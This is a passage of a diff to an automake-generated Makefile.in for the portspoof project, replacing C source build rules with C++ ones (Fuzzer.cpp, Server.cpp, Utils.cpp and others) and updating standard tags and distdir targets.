$(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-portspoof.o -MD -MP -MF $(DEPDIR)/portspoof-portspoof.Tpo -c -o portspoof-portspoof.o `test -f 'portspoof.c' || echo '$(srcdir)/'`portspoof.c -@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-portspoof.Tpo $(DEPDIR)/portspoof-portspoof.Po -@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='portspoof.c' object='portspoof-portspoof.o' libtool=no @AMDEPBACKSLASH@ -@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ -@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-portspoof.o `test -f 'portspoof.c' || echo '$(srcdir)/'`portspoof.c +portspoof-connection.o: connection.cpp +@am__fastdepCXX_TRUE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT portspoof-connection.o -MD -MP -MF $(DEPDIR)/portspoof-connection.Tpo -c -o portspoof-connection.o `test -f 'connection.cpp' || echo '$(srcdir)/'`connection.cpp +@am__fastdepCXX_TRUE@ $(am__mv) $(DEPDIR)/portspoof-connection.Tpo $(DEPDIR)/portspoof-connection.Po +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ source='connection.cpp' object='portspoof-connection.o' libtool=no @AMDEPBACKSLASH@ +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ +@am__fastdepCXX_FALSE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o portspoof-connection.o `test -f 'connection.cpp' || echo '$(srcdir)/'`connection.cpp -portspoof-portspoof.obj: portspoof.c -@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-portspoof.obj -MD -MP -MF $(DEPDIR)/portspoof-portspoof.Tpo -c -o portspoof-portspoof.obj `if test -f 'portspoof.c'; then $(CYGPATH_W) 'portspoof.c'; else $(CYGPATH_W) '$(srcdir)/portspoof.c'; fi` -@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-portspoof.Tpo $(DEPDIR)/portspoof-portspoof.Po -@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='portspoof.c' object='portspoof-portspoof.obj' libtool=no @AMDEPBACKSLASH@ -@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ -@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-portspoof.obj `if test -f 'portspoof.c'; then $(CYGPATH_W) 'portspoof.c'; else $(CYGPATH_W) '$(srcdir)/portspoof.c'; fi` +portspoof-connection.obj: connection.cpp +@am__fastdepCXX_TRUE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT portspoof-connection.obj -MD -MP -MF $(DEPDIR)/portspoof-connection.Tpo -c -o portspoof-connection.obj `if test -f 'connection.cpp'; then $(CYGPATH_W) 'connection.cpp'; else $(CYGPATH_W) '$(srcdir)/connection.cpp'; fi` +@am__fastdepCXX_TRUE@ $(am__mv) $(DEPDIR)/portspoof-connection.Tpo $(DEPDIR)/portspoof-connection.Po +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ source='connection.cpp' object='portspoof-connection.obj' libtool=no @AMDEPBACKSLASH@ +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ +@am__fastdepCXX_FALSE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o portspoof-connection.obj `if test -f 'connection.cpp'; then $(CYGPATH_W) 'connection.cpp'; else $(CYGPATH_W) '$(srcdir)/connection.cpp'; fi` -portspoof-revregex.o: revregex.c -@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-revregex.o -MD -MP -MF $(DEPDIR)/portspoof-revregex.Tpo -c -o portspoof-revregex.o `test -f 'revregex.c' || echo '$(srcdir)/'`revregex.c -@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-revregex.Tpo $(DEPDIR)/portspoof-revregex.Po -@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='revregex.c' object='portspoof-revregex.o' libtool=no @AMDEPBACKSLASH@ -@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ -@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-revregex.o `test -f 'revregex.c' || echo '$(srcdir)/'`revregex.c +portspoof-Fuzzer.o: Fuzzer.cpp +@am__fastdepCXX_TRUE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT portspoof-Fuzzer.o -MD -MP -MF $(DEPDIR)/portspoof-Fuzzer.Tpo -c -o portspoof-Fuzzer.o `test -f 'Fuzzer.cpp' || echo '$(srcdir)/'`Fuzzer.cpp +@am__fastdepCXX_TRUE@ $(am__mv) $(DEPDIR)/portspoof-Fuzzer.Tpo $(DEPDIR)/portspoof-Fuzzer.Po +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ source='Fuzzer.cpp' object='portspoof-Fuzzer.o' libtool=no @AMDEPBACKSLASH@ +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ +@am__fastdepCXX_FALSE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o portspoof-Fuzzer.o `test -f 'Fuzzer.cpp' || echo '$(srcdir)/'`Fuzzer.cpp -portspoof-revregex.obj: revregex.c -@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-revregex.obj -MD -MP -MF $(DEPDIR)/portspoof-revregex.Tpo -c -o portspoof-revregex.obj `if test -f 'revregex.c'; then $(CYGPATH_W) 'revregex.c'; else $(CYGPATH_W) '$(srcdir)/revregex.c'; fi` -@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-revregex.Tpo $(DEPDIR)/portspoof-revregex.Po -@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='revregex.c' object='portspoof-revregex.obj' libtool=no @AMDEPBACKSLASH@ -@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ -@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-revregex.obj `if test -f 'revregex.c'; then $(CYGPATH_W) 'revregex.c'; else $(CYGPATH_W) '$(srcdir)/revregex.c'; fi` +portspoof-Fuzzer.obj: Fuzzer.cpp +@am__fastdepCXX_TRUE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT portspoof-Fuzzer.obj -MD -MP -MF $(DEPDIR)/portspoof-Fuzzer.Tpo -c -o portspoof-Fuzzer.obj `if test -f 'Fuzzer.cpp'; then $(CYGPATH_W) 'Fuzzer.cpp'; else $(CYGPATH_W) '$(srcdir)/Fuzzer.cpp'; fi` +@am__fastdepCXX_TRUE@ $(am__mv) $(DEPDIR)/portspoof-Fuzzer.Tpo $(DEPDIR)/portspoof-Fuzzer.Po +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ source='Fuzzer.cpp' object='portspoof-Fuzzer.obj' libtool=no @AMDEPBACKSLASH@ +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ +@am__fastdepCXX_FALSE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o portspoof-Fuzzer.obj `if test -f 'Fuzzer.cpp'; then $(CYGPATH_W) 'Fuzzer.cpp'; else $(CYGPATH_W) '$(srcdir)/Fuzzer.cpp'; fi` -portspoof-log.o: log.c -@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-log.o -MD -MP -MF $(DEPDIR)/portspoof-log.Tpo -c -o portspoof-log.o `test -f 'log.c' || echo '$(srcdir)/'`log.c -@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-log.Tpo $(DEPDIR)/portspoof-log.Po -@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='log.c' object='portspoof-log.o' libtool=no @AMDEPBACKSLASH@ -@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ -@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-log.o `test -f 'log.c' || echo '$(srcdir)/'`log.c +portspoof-Portspoof.o: Portspoof.cpp +@am__fastdepCXX_TRUE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT portspoof-Portspoof.o -MD -MP -MF $(DEPDIR)/portspoof-Portspoof.Tpo -c -o portspoof-Portspoof.o `test -f 'Portspoof.cpp' || echo '$(srcdir)/'`Portspoof.cpp +@am__fastdepCXX_TRUE@ $(am__mv) $(DEPDIR)/portspoof-Portspoof.Tpo $(DEPDIR)/portspoof-Portspoof.Po +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ source='Portspoof.cpp' object='portspoof-Portspoof.o' libtool=no @AMDEPBACKSLASH@ +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ +@am__fastdepCXX_FALSE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o portspoof-Portspoof.o `test -f 'Portspoof.cpp' || echo '$(srcdir)/'`Portspoof.cpp -portspoof-log.obj: log.c -@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-log.obj -MD -MP -MF $(DEPDIR)/portspoof-log.Tpo -c -o portspoof-log.obj `if test -f 'log.c'; then $(CYGPATH_W) 'log.c'; else $(CYGPATH_W) '$(srcdir)/log.c'; fi` -@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-log.Tpo $(DEPDIR)/portspoof-log.Po -@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='log.c' object='portspoof-log.obj' libtool=no @AMDEPBACKSLASH@ -@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ -@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-log.obj `if test -f 'log.c'; then $(CYGPATH_W) 'log.c'; else $(CYGPATH_W) '$(srcdir)/log.c'; fi` +portspoof-Portspoof.obj: Portspoof.cpp +@am__fastdepCXX_TRUE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT portspoof-Portspoof.obj -MD -MP -MF $(DEPDIR)/portspoof-Portspoof.Tpo -c -o portspoof-Portspoof.obj `if test -f 'Portspoof.cpp'; then $(CYGPATH_W) 'Portspoof.cpp'; else $(CYGPATH_W) '$(srcdir)/Portspoof.cpp'; fi` +@am__fastdepCXX_TRUE@ $(am__mv) $(DEPDIR)/portspoof-Portspoof.Tpo $(DEPDIR)/portspoof-Portspoof.Po +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ source='Portspoof.cpp' object='portspoof-Portspoof.obj' libtool=no @AMDEPBACKSLASH@ +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ +@am__fastdepCXX_FALSE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o portspoof-Portspoof.obj `if test -f 'Portspoof.cpp'; then $(CYGPATH_W) 'Portspoof.cpp'; else $(CYGPATH_W) '$(srcdir)/Portspoof.cpp'; fi` -portspoof-config_file.o: config_file.c -@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-config_file.o -MD -MP -MF $(DEPDIR)/portspoof-config_file.Tpo -c -o portspoof-config_file.o `test -f 'config_file.c' || echo '$(srcdir)/'`config_file.c -@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-config_file.Tpo $(DEPDIR)/portspoof-config_file.Po -@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='config_file.c' object='portspoof-config_file.o' libtool=no @AMDEPBACKSLASH@ -@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ -@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-config_file.o `test -f 'config_file.c' || echo '$(srcdir)/'`config_file.c +portspoof-Server.o: Server.cpp +@am__fastdepCXX_TRUE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT portspoof-Server.o -MD -MP -MF $(DEPDIR)/portspoof-Server.Tpo -c -o portspoof-Server.o `test -f 'Server.cpp' || echo '$(srcdir)/'`Server.cpp +@am__fastdepCXX_TRUE@ $(am__mv) $(DEPDIR)/portspoof-Server.Tpo $(DEPDIR)/portspoof-Server.Po +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ source='Server.cpp' object='portspoof-Server.o' libtool=no @AMDEPBACKSLASH@ +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ +@am__fastdepCXX_FALSE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o portspoof-Server.o `test -f 'Server.cpp' || echo '$(srcdir)/'`Server.cpp -portspoof-config_file.obj: config_file.c -@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-config_file.obj -MD -MP -MF $(DEPDIR)/portspoof-config_file.Tpo -c -o portspoof-config_file.obj `if test -f 'config_file.c'; then $(CYGPATH_W) 'config_file.c'; else $(CYGPATH_W) '$(srcdir)/config_file.c'; fi` -@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-config_file.Tpo $(DEPDIR)/portspoof-config_file.Po -@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='config_file.c' object='portspoof-config_file.obj' libtool=no @AMDEPBACKSLASH@ -@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ -@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-config_file.obj `if test -f 'config_file.c'; then $(CYGPATH_W) 'config_file.c'; else $(CYGPATH_W) '$(srcdir)/config_file.c'; fi` +portspoof-Server.obj: Server.cpp +@am__fastdepCXX_TRUE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT portspoof-Server.obj -MD -MP -MF $(DEPDIR)/portspoof-Server.Tpo -c -o portspoof-Server.obj `if test -f 'Server.cpp'; then $(CYGPATH_W) 'Server.cpp'; else $(CYGPATH_W) '$(srcdir)/Server.cpp'; fi` +@am__fastdepCXX_TRUE@ $(am__mv) $(DEPDIR)/portspoof-Server.Tpo $(DEPDIR)/portspoof-Server.Po +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ source='Server.cpp' object='portspoof-Server.obj' libtool=no @AMDEPBACKSLASH@ +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ +@am__fastdepCXX_FALSE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o portspoof-Server.obj `if test -f 'Server.cpp'; then $(CYGPATH_W) 'Server.cpp'; else $(CYGPATH_W) '$(srcdir)/Server.cpp'; fi` + +portspoof-revregex.o: revregex.cpp +@am__fastdepCXX_TRUE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT portspoof-revregex.o -MD -MP -MF $(DEPDIR)/portspoof-revregex.Tpo -c -o portspoof-revregex.o `test -f 'revregex.cpp' || echo '$(srcdir)/'`revregex.cpp +@am__fastdepCXX_TRUE@ $(am__mv) $(DEPDIR)/portspoof-revregex.Tpo $(DEPDIR)/portspoof-revregex.Po +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ source='revregex.cpp' object='portspoof-revregex.o' libtool=no @AMDEPBACKSLASH@ +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ +@am__fastdepCXX_FALSE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o portspoof-revregex.o `test -f 'revregex.cpp' || echo '$(srcdir)/'`revregex.cpp + +portspoof-revregex.obj: revregex.cpp +@am__fastdepCXX_TRUE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT portspoof-revregex.obj -MD -MP -MF $(DEPDIR)/portspoof-revregex.Tpo -c -o portspoof-revregex.obj `if test -f 'revregex.cpp'; then $(CYGPATH_W) 'revregex.cpp'; else $(CYGPATH_W) '$(srcdir)/revregex.cpp'; fi` +@am__fastdepCXX_TRUE@ $(am__mv) $(DEPDIR)/portspoof-revregex.Tpo $(DEPDIR)/portspoof-revregex.Po +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ source='revregex.cpp' object='portspoof-revregex.obj' libtool=no @AMDEPBACKSLASH@ +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ +@am__fastdepCXX_FALSE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o portspoof-revregex.obj `if test -f 'revregex.cpp'; then $(CYGPATH_W) 'revregex.cpp'; else $(CYGPATH_W) '$(srcdir)/revregex.cpp'; fi` + +portspoof-Utils.o: Utils.cpp +@am__fastdepCXX_TRUE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT portspoof-Utils.o -MD -MP -MF $(DEPDIR)/portspoof-Utils.Tpo -c -o portspoof-Utils.o `test -f 'Utils.cpp' || echo '$(srcdir)/'`Utils.cpp +@am__fastdepCXX_TRUE@ $(am__mv) $(DEPDIR)/portspoof-Utils.Tpo $(DEPDIR)/portspoof-Utils.Po +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ source='Utils.cpp' object='portspoof-Utils.o' libtool=no @AMDEPBACKSLASH@ +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ +@am__fastdepCXX_FALSE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o portspoof-Utils.o `test -f 'Utils.cpp' || echo '$(srcdir)/'`Utils.cpp + +portspoof-Utils.obj: Utils.cpp +@am__fastdepCXX_TRUE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT portspoof-Utils.obj -MD -MP -MF $(DEPDIR)/portspoof-Utils.Tpo -c -o portspoof-Utils.obj `if test -f 'Utils.cpp'; then $(CYGPATH_W) 'Utils.cpp'; else $(CYGPATH_W) '$(srcdir)/Utils.cpp'; fi` +@am__fastdepCXX_TRUE@ $(am__mv) $(DEPDIR)/portspoof-Utils.Tpo $(DEPDIR)/portspoof-Utils.Po +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ source='Utils.cpp' object='portspoof-Utils.obj' libtool=no @AMDEPBACKSLASH@ +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ +@am__fastdepCXX_FALSE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o portspoof-Utils.obj `if test -f 'Utils.cpp'; then $(CYGPATH_W) 'Utils.cpp'; else $(CYGPATH_W) '$(srcdir)/Utils.cpp'; fi` ID: $(HEADERS) $(SOURCES) $(LISP) $(TAGS_FILES) list='$(SOURCES) $(HEADERS) $(LISP) $(TAGS_FILES)'; \ unique=`for i in $$list; do \ if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \ done | \ - $(AWK) ' { files[$$0] = 1; } \ - END { for (i in files) print i; }'`; \ + $(AWK) '{ files[$$0] = 1; nonempty = 1; } \ + END { if (nonempty) { for (i in files) print i; }; }'`; \ mkid -fID $$unique tags: TAGS TAGS: $(HEADERS) $(SOURCES) config.h.in $(TAGS_DEPENDENCIES) \ $(TAGS_FILES) $(LISP) - tags=; \ + set x; \ here=`pwd`; \ list='$(SOURCES) $(HEADERS) config.h.in $(LISP) $(TAGS_FILES)'; \ unique=`for i in $$list; do \ if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \ done | \ - $(AWK) ' { files[$$0] = 1; } \ - END { for (i in files) print i; }'`; \ - if test -z "$(ETAGS_ARGS)$$tags$$unique"; then :; else \ + $(AWK) '{ files[$$0] = 1; nonempty = 1; } \ + END { if (nonempty) { for (i in files) print i; }; }'`; \ + shift; \ + if test -z "$(ETAGS_ARGS)$$*$$unique"; then :; else \ test -n "$$unique" || unique=$$empty_fix; \ - $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ - $$tags $$unique; \ + if test $$# -gt 0; then \ + $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ + "$$@" $$unique; \ + else \ + $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ + $$unique; \ + fi; \ fi ctags: CTAGS CTAGS: $(HEADERS) $(SOURCES) config.h.in $(TAGS_DEPENDENCIES) \ $(TAGS_FILES) $(LISP) - tags=; \ - here=`pwd`; \ list='$(SOURCES) $(HEADERS) config.h.in $(LISP) $(TAGS_FILES)'; \ unique=`for i in $$list; do \ if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \ done | \ - $(AWK) ' { files[$$0] = 1; } \ - END { for (i in files) print i; }'`; \ - test -z "$(CTAGS_ARGS)$$tags$$unique" \ + $(AWK) '{ files[$$0] = 1; nonempty = 1; } \ + END { if (nonempty) { for (i in files) print i; }; }'`; \ + test -z "$(CTAGS_ARGS)$$unique" \ || $(CTAGS) $(CTAGSFLAGS) $(AM_CTAGSFLAGS) $(CTAGS_ARGS) \ - $$tags $$unique + $$unique GTAGS: here=`$(am__cd) $(top_builddir) && pwd` \ - && cd $(top_srcdir) \ - && gtags -i $(GTAGS_ARGS) $$here + && $(am__cd) $(top_srcdir) \ + && gtags -i $(GTAGS_ARGS) "$$here" distclean-tags: -rm -f TAGS ID GTAGS GRTAGS GSYMS GPATH tags @@ -408,13 +472,17 @@ distdir: $(DISTFILES) if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \ if test -d $$d/$$file; then \ dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \ - if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \ - cp -pR $(srcdir)/$$file $(distdir)$$dir || exit 1; \ + if test -d "$(distdir)/$$file"; then \ + find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ - cp -pR $$d/$$file $(distdir)$$dir || exit 1; \ + if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \ + cp -fpR $(srcdir)/$$file "$(distdir)$$dir" || exit 1; \ + find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ + fi; \ + cp -fpR $$d/$$file "$(distdir)$$dir" || exit 1; \ else \ - test -f $(distdir)/$$file \ - || cp -p $$d/$$file $(distdir)/$$file \ + test -f "$(distdir)/$$file" \ + || cp -p $$d/$$file "$(distdir)/$$file" \ || exit 1; \ fi; \ done @@ -445,6 +513,7 @@ clean-generic: distclean-generic: -test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES) + -test . = "$(srcdir)" || test -z "$(CONFIG_CLEAN_VPATH_FILES)" || rm -f $(CONFIG_CLEAN_VPATH_FILES) maintainer-clean-generic: @echo "This command is intended for maintainers to use" @@ -465,6 +534,8 @@ dvi-am: html: html-am +html-am: + info: info-am info-am: @@ -473,18 +544,28 @@ install-data-am: install-dvi: install-dvi-am +install-dvi-am: + install-exec-am: install-binPROGRAMS install-html: install-html-am +install-html-am: + install-info: install-info-am +install-info-am: + install-man: install-pdf: install-pdf-am +install-pdf-am: + install-ps: install-ps-am +install-ps-am: + installcheck-am: maintainer-clean: maintainer-clean-am @@ -506,7 +587,7 @@ ps-am: uninstall-am: uninstall-binPROGRAMS -.MAKE: install-am install-strip +.MAKE: all install-am install-strip .PHONY: CTAGS GTAGS all all-am check check-am clean clean-binPROGRAMS \ clean-generic ctags distclean distclean-compile \ @@ -521,6 +602,7 @@ 